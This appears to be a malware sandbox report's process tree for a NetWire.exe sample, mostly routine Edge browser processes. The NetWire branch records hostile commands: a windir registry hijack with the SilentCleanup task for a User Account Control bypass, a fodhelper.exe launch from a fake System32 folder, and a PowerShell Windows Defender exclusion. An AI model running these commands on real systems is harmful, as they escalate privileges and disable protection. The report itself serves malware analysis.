  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:3812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8240 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
  2⤵
  PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1
  2⤵
  PID:3448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8228 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
  2⤵
  PID:5632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
  2⤵
  PID:5288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1
  2⤵
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8552 /prefetch:1
  2⤵
  PID:5616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8560 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
  2⤵
  PID:1772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8096 /prefetch:1
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:5192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7908 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8424 /prefetch:1
  2⤵
  PID:5776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1
  2⤵
  PID:5476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7492 /prefetch:8
  2⤵
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6468 /prefetch:8
  2⤵
  PID:4860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7208 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
  2⤵
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8912 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4112 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3600 /prefetch:8
  2⤵
  PID:5596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7616 /prefetch:8
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8724 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5484
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1652
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:5056
  - - C:\Windows\SysWOW64\Notepad.exe
      C:\Windows\System32\Notepad.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5744
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7544
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:8172
      - C:\Windows\SysWOW64\reg.exe
        
        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7848
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        6⤵
        Abuse Elevation Control Mechanism: Bypass User Account Control
        System Location Discovery: System Language Discovery
        
        PID:9428
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7792
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4164
      - C:\Windows \System32\fodhelper.exe
        
        "C:\Windows \System32\fodhelper.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
        7⤵
        
        PID:856
        
        C:\Windows\system32\cmd.exe
        
        cmd /c C:\Users\Public\x.vbs
        8⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5520
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"
        9⤵
        Checks computer location settings
        
        PID:9048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "
        10⤵
        
        PID:9972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:9560
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:1728
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7704
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7748
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:8036
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:9524
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:9572
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:9912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
  2⤵
  PID:9832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:9748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8704 /prefetch:1
  2⤵
  PID:6416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
  2⤵
  PID:7280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:1
  2⤵
  PID:7148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
  2⤵
  PID:9988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7592 /prefetch:1
  2⤵
  PID:9920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8656 /prefetch:1
  2⤵
  PID:4572
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\BabylonToolbar.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:6192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:8132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:9000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8744 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8576 /prefetch:1
  2⤵
  PID:6596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3368 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:10120
